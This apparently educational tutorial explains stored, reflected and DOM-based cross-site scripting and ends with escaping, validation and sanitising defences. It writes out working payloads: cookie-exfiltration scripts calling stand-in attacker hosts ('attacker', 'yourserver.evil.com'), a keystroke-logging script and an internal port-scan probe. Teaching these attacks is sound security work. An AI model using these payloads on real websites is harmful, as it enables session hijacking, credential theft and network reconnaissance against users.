Cross-Site Scripting (XSS)

Introduction

Cross-site scripting, also known as XSS is a security vulnerability typically found in web applications. It’s a type of injection which can allow an attacker to execute malicious scripts and have it execute on a victim’s machine.

A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS.

Possible Attacks

• Cookie Stealing - Stealing your cookie from an authenticated session, allowing an attacker to login as you without themselves having to provide authentication.

• Keylogging - An attacker can register a keyboard event listener and send all of your keystrokes to their own server.

• Webcam snapshot - Using HTML5 capabilities its possible to even take snapshots from a compromised computer webcam.

• Phishing - An attacker could either insert fake login forms into the page, or have you redirected to a clone of a site tricking you into revealing your sensitive data.

• Port Scanning - You read that correctly. You can use stored XSS to scan an internal network and identify other hosts on their network.

• Other browser based exploits - There are millions of possibilities with XSS.

3 Types of XSS

1. Stored/Persistent XSS (Server-side)

2. Reflected XSS (Client-side)

3. DOM-Based XSS (Special)

Stored XSS

The most dangerous type of XSS. This is where a malicious string originates from the website’s database. This often happens when a website allows user input that is not sanitised (remove the "bad parts" of a users input) when inserted into the database.

A attacker creates a payload in a field when signing up to a website that is stored in the websites database. If the website doesn't properly sanitise that field, when the site displays that field on the page, it will execute the payload to everyone who visits it.

The payload could be as simple as <script>alert(1)</script>

However, this payload wont just execute in your browser but any other browsers that display the malicious data inserted into the database.

Cookie Stealing

Stored XSS can be used to steal a victims cookie (data on a machine that authenticates a user to a webserver). This can be done by having a victims browser parse the following Javascript code: <script>window.location='http://attacker/?cookie='+document.cookie</script> Once your victim (in this case you hope its Jack), to visit this page, it will log his cookie for you to steal!You can also use other HTML tags to make requests, including the img tag <img src="https://yourserver.evil.com/collect.gif?cookie=' + document.cookie + '" />

Reflected XSS

The malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload.

This might seem harmless as it requires the victim to send a request containing an attackers payload, and a user wouldn't attack themselves. However, attackers could trick the user into clicking their crafted link that contains their payload via social-engineering them via email..

Reflected XSS is the most common type of XSS attack.

Example

An attacker crafts a URL containing a malicious payload and sends it to the victim. The victim is tricked by the attacker into clicking the URL. The request could be http://example.com/search?keyword=<script>...</script>

The website then includes this malicious payload from the request in the response to the user. The victims browser will execute the payload inside the response. The data the script gathered is then sent back to the attacker (it might not necessarily be sent from the victim, but to another website where the attacker then gathers this data - this protects the attacker from directly receiving the victims data).

Dom Based XSS

DOM stands for Document Object Model and is a programming interface for HTML and XML documents. It represents the page so that programs can change the document structure, style and content. A web page is a document and this document can be either displayed in the browser window or as the HTML source.

Example

In a DOM-based XSS attack, a malicious payload is not actually parsed by the victim's browser until the website's legitimate JavaScript is executed. So what does this mean?

With reflective xss, an attackers payload will be injected directly on the website and will not matter when other Javascript on the site gets loaded.

<html>
    You searched for <em><script>...</script></em>
</html

With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so:

var keyword = document.querySelector('#search')
keyword.innerHTML = <script>...</script>

Common XSS Payloads

Port Scanner

Link If an attacker is interested in what other devices are connected on the network, they can use Javascript to make requests to a range of IP addresses and determine which one responds.

For example, a website could try to find if your router has a web interface at 192.168.0.1 by:

<img src="http://192.168.0.1/favicon.ico" onload="alert('Found')" onerror="alert('Not found')">

XSS Keylogger

Link You can log all keystrokes of a user, capturing their password and other sensitive information they type into the webpage.

<script type="text/javascript">
	// Variable to store key-strokes in
	let l = "";
	// Event to listen for key presses
	document.onkeypress = function (e) {
		// "If user types, log it to the l variable"
   	l += e.key;
		// update this line to post to your own server
   	console.log(l);
	}
</script>

Filter Evasion

There are many techniques used to filter malicious payloads that are used with cross-site scripting.

Others

• Popup's <script>alert(“Hello World”)</script>

  • Creates a Hello World message popup on a users browser.

• Writing HTML (document.write)

  • Override the website's HTML to add your own (essentially defacing the entire page).

XSS-Payloads.com

is a website that has XSS related Payloads, Tools, Documentation and more. You can download XSS payloads that take snapshots from a webcam or even get a more capable port and network scanner.

Protection Methods

There are many ways to prevent XSS, here are the 3 ways to keep cross-site scripting our of your application.

1. Escaping - Escape all user input. This means any data your application has received is secure before rendering it for your end users. By escaping user input, key characters in the data received but the web page will be prevented from being interpreter in any malicious way. For example, you could disallow the < and > characters from being rendered.

2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.

3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity &#60;